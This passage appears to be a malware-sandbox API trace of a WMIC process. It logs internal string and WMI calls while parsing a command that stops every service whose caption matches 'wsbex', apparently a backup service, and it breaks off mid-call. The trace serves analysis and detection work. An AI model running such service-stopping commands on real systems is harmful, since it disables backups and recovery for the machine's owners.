SysStringLen (param_1="HTABLE") returned 0x6 [0106.844] SysStringLen (param_1="CSV") returned 0x3 [0106.844] SysStringLen (param_1="HFORM") returned 0x5 [0106.845] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.845] SysStringLen (param_1="TABLE") returned 0x5 [0106.845] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.845] SysStringLen (param_1="VALUE") returned 0x5 [0106.845] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.845] SysStringLen (param_1="XML") returned 0x3 [0106.845] SysStringLen (param_1="XML") returned 0x3 [0106.845] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.845] SysStringLen (param_1="texttablewsys") returned 0xd [0106.845] SysStringLen (param_1="TABLE") returned 0x5 [0106.845] SysStringLen (param_1="texttablewsys") returned 0xd [0106.845] SysStringLen (param_1="XML") returned 0x3 [0106.845] SysStringLen (param_1="texttablewsys") returned 0xd [0106.845] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.845] SysStringLen (param_1="XML") returned 0x3 [0106.845] SysStringLen (param_1="texttablewsys") returned 0xd [0106.846] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.846] SysStringLen (param_1="TABLE") returned 0x5 [0106.846] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.846] SysStringLen (param_1="XML") returned 0x3 [0106.846] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.846] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.846] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.846] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.846] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0106.846] SysStringLen (param_1="TABLE") returned 0x5 [0106.846] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0106.846] SysStringLen (param_1="XML") returned 0x3 [0106.846] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0106.846] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.846] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0106.846] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.846] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.847] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0106.847] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0106.847] SysStringLen (param_1="TABLE") returned 0x5 [0106.847] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0106.847] SysStringLen (param_1="XML") returned 0x3 [0106.847] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0106.847] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.847] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0106.847] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.847] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.847] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0106.847] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0106.847] SysStringLen (param_1="TABLE") returned 0x5 [0106.847] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0106.847] SysStringLen (param_1="XML") returned 0x3 [0106.848] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0106.848] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.848] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0106.848] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.848] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0106.848] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0106.848] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.848] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0106.848] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0106.848] SysStringLen (param_1="TABLE") returned 0x5 [0106.848] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0106.848] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.848] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0106.848] SysStringLen (param_1="XML") returned 0x3 [0106.848] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0106.848] SysStringLen (param_1="texttablewsys") returned 0xd [0106.848] SysStringLen (param_1="XML") returned 0x3 [0106.848] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0106.849] SysStringLen (param_1="htable-sortby") returned 0xd [0106.849] SysStringLen (param_1="TABLE") returned 0x5 [0106.849] SysStringLen (param_1="htable-sortby") returned 0xd [0106.849] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.849] SysStringLen (param_1="htable-sortby") returned 0xd [0106.849] SysStringLen (param_1="XML") returned 0x3 [0106.849] SysStringLen (param_1="htable-sortby") returned 0xd [0106.849] SysStringLen (param_1="texttablewsys") returned 0xd [0106.849] SysStringLen (param_1="htable-sortby") returned 0xd [0106.849] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0106.849] SysStringLen (param_1="XML") returned 0x3 [0106.849] SysStringLen (param_1="htable-sortby") returned 0xd [0106.849] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0106.849] SysStringLen (param_1="TABLE") returned 0x5 [0106.849] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0106.850] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.850] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0106.850] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.850] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0106.850] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0106.850] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.850] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0106.850] SysStringLen (param_1="wmiclimofformat") returned 0xf [0106.850] SysStringLen (param_1="TABLE") returned 0x5 [0106.850] SysStringLen (param_1="wmiclimofformat") returned 0xf [0106.850] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.850] SysStringLen (param_1="wmiclimofformat") returned 0xf [0106.850] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.850] SysStringLen (param_1="wmiclimofformat") returned 0xf [0106.850] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0106.850] SysStringLen (param_1="wmiclimofformat") returned 0xf [0106.850] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0106.850] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.850] SysStringLen (param_1="wmiclimofformat") returned 0xf [0106.851] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0106.851] SysStringLen (param_1="TABLE") returned 0x5 [0106.851] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0106.851] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.851] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0106.851] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.851] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0106.851] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0106.851] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0106.851] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0106.851] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0106.851] SysStringLen (param_1="TABLE") returned 0x5 [0106.851] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0106.851] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0106.851] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0106.851] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0106.851] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0106.851] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0106.851] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0106.851] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0106.851] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0106.851] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0106.852] FreeThreadedDOMDocument:IUnknown:Release (This=0xb145a8) returned 0x0 [0106.852] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE" [0106.852] memcpy_s (in: _Destination=0xb38040, _DestinationSize=0x7e, _Source=0xbf1588, _SourceSize=0x7a | out: _Destination=0xb38040) returned 0x0 [0106.852] GetLocalTime (in: lpSystemTime=0x94f9c4 | out: lpSystemTime=0x94f9c4*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x8, wSecond=0x3b, wMilliseconds=0x2ca)) [0106.852] _vsnwprintf (in: _Buffer=0xb380c8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x94f9a4 | out: _Buffer="04-15-2018T10:08:59") returned 19 [0106.852] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE") returned 57 [0106.852] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE") returned 57 [0106.852] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE") returned 57 [0106.852] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE") returned 57 [0106.852] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE") returned 57 [0106.852] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE") returned 57 [0106.852] lstrlenW (lpString="SERVICE") returned 7 [0106.852] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0106.852] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE") returned 57 [0106.852] lstrlenW (lpString="WHERE") returned 5 [0106.852] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0106.852] memmove_s (in: _Destination=0xb32c78, _DestinationSize=0x4, _Source=0xb32c68, _SourceSize=0x4 | out: _Destination=0xb32c78) returned 0x0 [0106.852] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE") returned 57 [0106.853] lstrlenW (lpString="'caption LIKE '%wsbex%''") returned 24 [0106.853] _wcsicmp (_String1="'caption LIKE '%wsbex%''", _String2="\"NULL\"") returned 5 [0106.853] lstrlenW (lpString="'caption LIKE '%wsbex%''") returned 24 [0106.853] lstrlenW (lpString="'caption LIKE '%wsbex%''") returned 24 [0106.853] memmove_s (in: _Destination=0xb37db8, _DestinationSize=0x8, _Source=0xb32c78, _SourceSize=0x8 | out: _Destination=0xb37db8) returned 0x0 [0106.853] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE") returned 57 [0106.853] lstrlenW (lpString="CALL") returned 4 [0106.853] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0106.853] memmove_s (in: _Destination=0xb37fe0, _DestinationSize=0xc, _Source=0xb37db8, _SourceSize=0xc | out: _Destination=0xb37fe0) returned 0x0 [0106.853] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE") returned 57 [0106.853] lstrlenW (lpString="STOPSERVICE") returned 11 [0106.853] _wcsicmp (_String1="STOPSERVICE", _String2="\"NULL\"") returned 81 [0106.853] memmove_s (in: _Destination=0xb32298, _DestinationSize=0x10, _Source=0xb37fe0, _SourceSize=0x10 | out: _Destination=0xb32298) returned 0x0 [0106.853] lstrlenW (lpString="QUIT") returned 4 [0106.853] lstrlenW (lpString="SERVICE") returned 7 [0106.853] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0106.853] lstrlenW (lpString="EXIT") returned 4 [0106.853] lstrlenW (lpString="SERVICE") returned 7 [0106.853] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0106.853] WbemLocator:IUnknown:AddRef (This=0xbf8050) returned 0x2 [0106.853] lstrlenW (lpString="/") returned 1 [0106.853] lstrlenW (lpString="SERVICE") returned 7 [0106.853] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0106.853] lstrlenW (lpString="-") returned 1 [0106.853] lstrlenW (lpString="SERVICE") returned 7 [0106.853] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0106.853] lstrlenW (lpString="CLASS") returned 5 [0106.853] lstrlenW (lpString="SERVICE") returned 7 [0106.853] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0106.853] lstrlenW (lpString="PATH") returned 4 [0106.853] lstrlenW (lpString="SERVICE") returned 7 [0106.853] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0106.853] lstrlenW (lpString="CONTEXT") returned 7 [0106.853] lstrlenW (lpString="SERVICE") returned 7 [0106.853] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0106.853] lstrlenW (lpString="SERVICE") returned 7 [0106.853] lstrlenW (lpString="SERVICE") returned 7 [0106.854] GetCurrentThreadId () returned 0xd38 [0106.854] ??0CHString@@QAE@XZ () returned 0x94f918 [0106.854] WbemLocator:IWbemLocator:ConnectServer (in: This=0xbf8050, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0xc20600) returned 0x0 [0106.895] CoSetProxyBlanket (pProxy=0xc20600, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0106.895] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.895] GetCurrentThreadId () returned 0xd38 [0106.895] ??0CHString@@QAE@XZ () returned 0x94f8c0 [0106.896] SysStringLen (param_1="root\\cli") returned 0x8 [0106.896] SysStringLen (param_1="\\") returned 0x1 [0106.896] SysStringLen (param_1="root\\cli\\") returned 0x9 [0106.896] SysStringLen (param_1="ms_409") returned 0x6 [0106.896] WbemLocator:IWbemLocator:ConnectServer (in: This=0xbf8050, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0xc20740) returned 0x0 [0106.902] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.902] GetCurrentThreadId () returned 0xd38 [0106.902] ??0CHString@@QAE@XZ () returned 0x94f91c [0106.902] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0106.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xb38a00, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0106.902] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0106.902] SysStringLen (param_1="SERVICE") returned 0x7 [0106.902] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0106.902] SysStringLen (param_1="'") returned 0x1 [0106.902] IWbemServices:GetObject (in: This=0xc20600, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x94f918*=0x0, ppCallResult=0x0 | out: ppObject=0x94f918*=0xc45300, ppCallResult=0x0) returned 0x0 [0106.908] IWbemClassObject:Get (in: This=0xc45300, wszName="Target", lFlags=0, pVal=0x94f8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.908] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0106.908] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0106.908] IWbemClassObject:Get (in: This=0xc45300, wszName="PWhere", lFlags=0, pVal=0x94f8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f8f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.908] lstrlenW (lpString="WHERE Name='#'") returned 14 [0106.908] lstrlenW (lpString="WHERE Name='#'") returned 14 [0106.908] IWbemClassObject:Get (in: This=0xc45300, wszName="Connection", lFlags=0, pVal=0x94f8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f8f0*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc456c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.908] IUnknown:QueryInterface (in: This=0xc456c0, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x94f90c | out: ppvObject=0x94f90c*=0xc456c0) returned 0x0 [0106.908] GetCurrentThreadId () returned 0xd38 [0106.908] ??0CHString@@QAE@XZ () returned 0x94f88c [0106.908] IWbemClassObject:Get (in: This=0xc456c0, wszName="Namespace", lFlags=0, pVal=0x94f870*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f870*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.909] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0106.909] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0106.909] IWbemClassObject:Get (in: This=0xc456c0, wszName="Locale", lFlags=0, pVal=0x94f870*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc278ec, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f870*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.909] lstrlenW (lpString="ms_409") returned 6 [0106.909] lstrlenW (lpString="ms_409") returned 6 [0106.909] IWbemClassObject:Get (in: This=0xc456c0, wszName="User", lFlags=0, pVal=0x94f870*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc278ec, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f870*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.909] IWbemClassObject:Get (in: This=0xc456c0, wszName="Password", lFlags=0, pVal=0x94f870*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f870*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.909] IWbemClassObject:Get (in: This=0xc456c0, wszName="Server", lFlags=0, pVal=0x94f870*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f870*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.909] lstrlenW (lpString=".") returned 1 [0106.909] lstrlenW (lpString=".") returned 1 [0106.909] IWbemClassObject:Get (in: This=0xc456c0, wszName="Authority", lFlags=0, pVal=0x94f870*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc278ec, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f870*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.909] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.910] IUnknown:Release (This=0xc456c0) returned 0x1 [0106.910] GetCurrentThreadId () returned 0xd38 [0106.910] ??0CHString@@QAE@XZ () returned 0x94f87c [0106.910] IWbemClassObject:Get (in: This=0xc45300, wszName="__RELPATH", lFlags=0, pVal=0x94f864*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f864*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.910] GetCurrentThreadId () returned 0xd38 [0106.910] ??0CHString@@QAE@XZ () returned 0x94f7f8 [0106.910] ??0CHString@@QAE@PBG@Z () returned 0x94f7f4 [0106.910] ??0CHString@@QAE@ABV0@@Z () returned 0x94f774 [0106.910] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0106.910] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xb38a00 [0106.910] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0106.910] ?Left@CHString@@QBE?AV1@H@Z () returned 0x94f76c [0106.910] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x94f770 [0106.910] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x94f7f4 [0106.910] ??1CHString@@QAE@XZ () returned 0x1 [0106.910] ??1CHString@@QAE@XZ () returned 0x1 [0106.910] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x94f768 [0106.910] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x94f774 [0106.910] ??1CHString@@QAE@XZ () returned 0x1 [0106.910] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xb38a60 [0106.910] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0106.910] ?Left@CHString@@QBE?AV1@H@Z () returned 0x94f76c [0106.910] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x94f770 [0106.910] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x94f7f4 [0106.910] ??1CHString@@QAE@XZ () returned 0x1 [0106.910] ??1CHString@@QAE@XZ () returned 0x1 [0106.910] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x94f768 [0106.910] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x94f774 [0106.910] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.910] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0106.910] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.910] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0106.910] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0106.910] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0106.910] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0106.911] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0106.911] SysStringLen (param_1="\"") returned 0x1 [0106.911] IWbemServices:GetObject (in: This=0xc20740, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x94f804*=0x0, ppCallResult=0x0 | out: ppObject=0x94f804*=0xc45aa0, ppCallResult=0x0) returned 0x0 [0106.912] IWbemClassObject:Get (in: This=0xc45aa0, wszName="Text", lFlags=0, pVal=0x94f7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x94f7d0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xc30510*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xc27dd8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.912] SafeArrayGetLBound (in: psa=0xc30510, nDim=0x1, plLbound=0x94f7e0 | out: plLbound=0x94f7e0) returned 0x0 [0106.912] SafeArrayGetUBound (in: psa=0xc30510, nDim=0x1, plUbound=0x94f7e4 | out: plUbound=0x94f7e4) returned 0x0 [0106.912] SafeArrayGetElement (in: psa=0xc30510, rgIndices=0x94f7fc, pv=0x94f7e8 | out: pv=0x94f7e8) returned 0x0 [0106.912] SysStringLen (param_1="Service application management. ") returned 0x20 [0106.912] IUnknown:Release (This=0xc45aa0) returned 0x0 [0106.912] ??1CHString@@QAE@XZ () returned 0x1 [0106.912] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.913] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.913] lstrlenW (lpString="Service application management. ") returned 32 [0106.913] lstrlenW (lpString="Service application management. ") returned 32 [0106.913] IUnknown:Release (This=0xc45300) returned 0x0 [0106.913] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.913] lstrlenW (lpString="PATH") returned 4 [0106.913] lstrlenW (lpString="WHERE") returned 5 [0106.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0106.913] lstrlenW (lpString="WHERE") returned 5 [0106.913] lstrlenW (lpString="WHERE") returned 5 [0106.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0106.913] lstrlenW (lpString="/") returned 1 [0106.914] lstrlenW (lpString="caption LIKE '%wsbex%'") returned 22 [0106.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%wsbex%'", cchCount1=22, lpString2="/", cchCount2=1) returned 3 [0106.914] lstrlenW (lpString="-") returned 1 [0106.914] lstrlenW (lpString="caption LIKE '%wsbex%'") returned 22 [0106.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%wsbex%'", cchCount1=22, lpString2="-", cchCount2=1) returned 3 [0106.914] lstrlenW (lpString="caption LIKE '%wsbex%'") returned 22 [0106.914] lstrlenW (lpString="caption LIKE '%wsbex%'") returned 22 [0106.914] lstrlenW (lpString="/") returned 1 [0106.914] lstrlenW (lpString="CALL") returned 4 [0106.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0106.914] lstrlenW (lpString="-") returned 1 [0106.914] lstrlenW (lpString="CALL") returned 4 [0106.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0106.914] lstrlenW (lpString="CALL") returned 4 [0106.914] lstrlenW (lpString="CALL") returned 4 [0106.914] lstrlenW (lpString="GET") returned 3 [0106.914] lstrlenW (lpString="CALL") returned 4 [0106.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0106.914] lstrlenW (lpString="LIST") returned 4 [0106.914] lstrlenW (lpString="CALL") returned 4 [0106.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0106.914] lstrlenW (lpString="SET") returned 3 [0106.914] lstrlenW (lpString="CALL") returned 4 [0106.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0106.914] lstrlenW (lpString="CREATE") returned 6 [0106.914] lstrlenW (lpString="CALL") returned 4 [0106.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0106.914] lstrlenW (lpString="CALL") returned 4 [0106.914] lstrlenW (lpString="CALL") returned 4 [0106.914] CompareStringW (Locale=0x800, 